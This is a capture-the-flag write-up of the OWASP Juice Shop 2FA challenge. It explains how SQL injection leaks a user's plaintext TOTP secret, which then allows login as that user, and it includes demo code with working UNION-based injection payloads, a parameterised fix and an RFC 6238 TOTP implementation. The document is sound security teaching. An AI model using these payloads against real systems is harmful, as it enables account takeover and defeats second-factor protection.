Another Juice Shop challenge I really enjoyed recently was Two Factor Authentication.

Here was the question:

Solve the 2FA challenge for user “wurstbrot”. (Disabling, bypassing or overwriting his 2FA settings does not count as a solution)

A more detailed explanation stated:

In the Juice Shop one customer was very security-aware and set up 2FA for his account. He goes by the hilarious username wurstbrot.

  • As always, first learn how the feature under attack is used and behaves under normal conditions.

  • Make sure you understand how 2FA with TOTP (time-based one-time password) works and which part of it is the critically sensitive one.

  • Solving the challenge Retrieve a list of all user credentials via SQL Injection before tackling this one will definitely help. But it will not carry you all the way.

I felt I had a fairly good grasp of TOTP 2FA and how it works: the authenticator app and the server share a secret, and each derives the current code from that secret and the current 30-second time step, so whoever holds the secret can produce valid codes. I also remembered there was a column related to TOTP in the Users table from another challenge that dumped the website's database (SQLite) schema. So I used the same injection tactic in Burp Suite to list all of the columns that existed in the Users table:

Users table details

And in that table there was a column called totpSecret, which looked promising. So I used another injection request to see what data was there:

Getting User TOTP details

And sure enough, the row for the user “wurstbrot” held a TOTP setup key in plain text.

The user’s TOTP key
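The two injection steps described above (recover the schema, then pull the column you care about) condensed into a runnable demo. This is an added example, not code from the post or from Juice Shop: the product search endpoint, the table contents, the email addresses and the secret are all constructed here; only the `Users` table and `totpSecret` column names come from the schema dump in the post. The same payload against the parameterised version of the search returns nothing.

```python
import sqlite3
from typing import Dict, List, Tuple


def build_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the shop's SQLite database (not Juice Shop data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Users (
            id INTEGER PRIMARY KEY,
            email TEXT,
            password TEXT,       -- placeholder value; a real app stores a hash here
            totpSecret TEXT      -- base32 shared secret, stored in the clear
        );
        CREATE TABLE Products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        INSERT INTO Users VALUES (1, 'admin@example.com', 'hashed-pw-1', '');
        INSERT INTO Users VALUES (2, 'wurstbrot@example.com', 'hashed-pw-2', 'JBSWY3DPEHPK3PXP');
        INSERT INTO Products VALUES (1, 'Apple Juice', 'Classic.');
        INSERT INTO Products VALUES (2, 'Orange Juice', 'Fresh.');
    """)
    return db


def search_vulnerable(db: sqlite3.Connection, q: str) -> List[Tuple]:
    """Hypothetical product search that splices user input straight into the SQL."""
    sql = f"SELECT id, name, description FROM Products WHERE name LIKE '%{q}%'"
    return db.execute(sql).fetchall()


def search_fixed(db: sqlite3.Connection, q: str) -> List[Tuple]:
    """Same search with a bound parameter: the input can only ever be a LIKE pattern."""
    sql = "SELECT id, name, description FROM Products WHERE name LIKE ?"
    return db.execute(sql, (f"%{q}%",)).fetchall()


# Step 1: UNION in sqlite_master to recover the schema. The SELECT must return
# the same number of columns as the original query (three here); the first
# column is a tag so the injected rows can be told apart from real products.
SCHEMA_PAYLOAD = "' UNION SELECT 'schema', name, sql FROM sqlite_master WHERE type='table'--"

# Step 2: with the column names known, UNION in the interesting ones.
SECRET_PAYLOAD = "' UNION SELECT 'user', email, totpSecret FROM Users--"


def dump_schema(db: sqlite3.Connection) -> Dict[str, str]:
    """Returns {table_name: CREATE statement} pulled through the vulnerable search."""
    rows = search_vulnerable(db, SCHEMA_PAYLOAD)
    return {name: sql for tag, name, sql in rows if tag == "schema"}


def leak_totp_secrets(db: sqlite3.Connection) -> Dict[str, str]:
    """Returns {email: totpSecret} for every user who has a secret set."""
    rows = search_vulnerable(db, SECRET_PAYLOAD)
    return {email: secret for tag, email, secret in rows if tag == "user" and secret}


if __name__ == "__main__":
    demo = build_demo_db()
    print(dump_schema(demo)["Users"])
    print(leak_totp_secrets(demo))
```

The `--` in each payload comments out the trailing `%'` of the original query, and the leading `'` closes the string the input was dropped into; that is why the first thing to learn about an injectable query is how many columns it returns and what the surrounding quoting looks like.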

A TOTP setup key is the base32 form of the shared secret; the QR code an authenticator app scans only encodes that same secret (in an otpauth:// URI), so the key can be typed in by hand instead of using the phone's camera. All I had to do was enter wurstbrot's key into Google Authenticator and it started producing his current TOTP codes.
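What Google Authenticator does with that key, as an added example written for this page (not code from the post or from Juice Shop): decode the base32 setup key, compute RFC 6238 TOTP from it, and verify a submitted code on the server side. It also pulls the secret out of an otpauth:// URI, which is all a QR code contains. The secret used here is the RFC 6238 reference key `12345678901234567890` in base32, not wurstbrot's secret, so the codes can be checked against the RFC's published test vectors.

```python
import base64
import hashlib
import hmac
import struct
import time
from typing import Optional
from urllib.parse import parse_qs, urlparse

# RFC 6238 reference key "12345678901234567890" as a base32 setup key.
# Constructed for this demo; it is not a secret from the challenge.
RFC6238_SECRET_B32 = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"


def decode_secret(secret_b32: str) -> bytes:
    """Turn the base32 setup key (what you type into the app) into raw key bytes."""
    s = secret_b32.strip().replace(" ", "").upper()
    s += "=" * (-len(s) % 8)  # setup keys usually omit the base32 padding
    return base64.b32decode(s)


def hotp(key: bytes, counter: int, digits: int = 6, algo=hashlib.sha1) -> str:
    """RFC 4226 HOTP: HMAC over the big-endian 8-byte counter, then dynamic truncation."""
    mac = hmac.new(key, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret_b32: str, at: Optional[int] = None, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with counter = floor(unix_time / step)."""
    if at is None:
        at = int(time.time())
    return hotp(decode_secret(secret_b32), at // step, digits)


def verify_totp(secret_b32: str, code: str, at: int, window: int = 1, step: int = 30) -> bool:
    """Server-side check allowing +/- `window` time steps of clock drift."""
    key = decode_secret(secret_b32)
    return any(
        hmac.compare_digest(hotp(key, at // step + drift), code)
        for drift in range(-window, window + 1)
    )


def secret_from_otpauth(uri: str) -> str:
    """Extract the secret from an otpauth:// URI, which is what the enrolment QR code encodes."""
    parsed = urlparse(uri)
    if parsed.scheme != "otpauth" or parsed.netloc != "totp":
        raise ValueError("not a TOTP otpauth URI")
    return parse_qs(parsed.query)["secret"][0]


if __name__ == "__main__":
    # Anyone holding the secret computes the same code the legitimate app shows.
    print("current code:", totp(RFC6238_SECRET_B32))
```

Both sides of the scheme run the same `hotp` function over the same key, which is the point the challenge makes: the server must hold the secret in a form it can feed to HMAC, so leaking that column is equivalent to cloning the authenticator.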

I then used the SQL injection from a previous challenge to log in as wurstbrot without his password, and when the site prompted me for the 2FA code I entered the one from my authenticator.

Bypassing the regular password

And with that the challenge was solved. The lesson here is that 2FA with a third-party authenticator app can be a very effective way to secure an account… unless the setup key sits in plain text where an attacker can get to it. TOTP is a symmetric scheme: the server needs the same secret the app has in order to verify codes, so it cannot be stored as a one-way hash the way a password can. That makes the second factor only as safe as the database and every query path into it, and here a single SQL injection handed over both factors. Encrypting the secret at rest and fixing the injection both help, but any factor that is a shared secret falls with the database, which is the argument for public-key factors such as WebAuthn, where the server stores nothing an attacker can log in with.

Challenge solved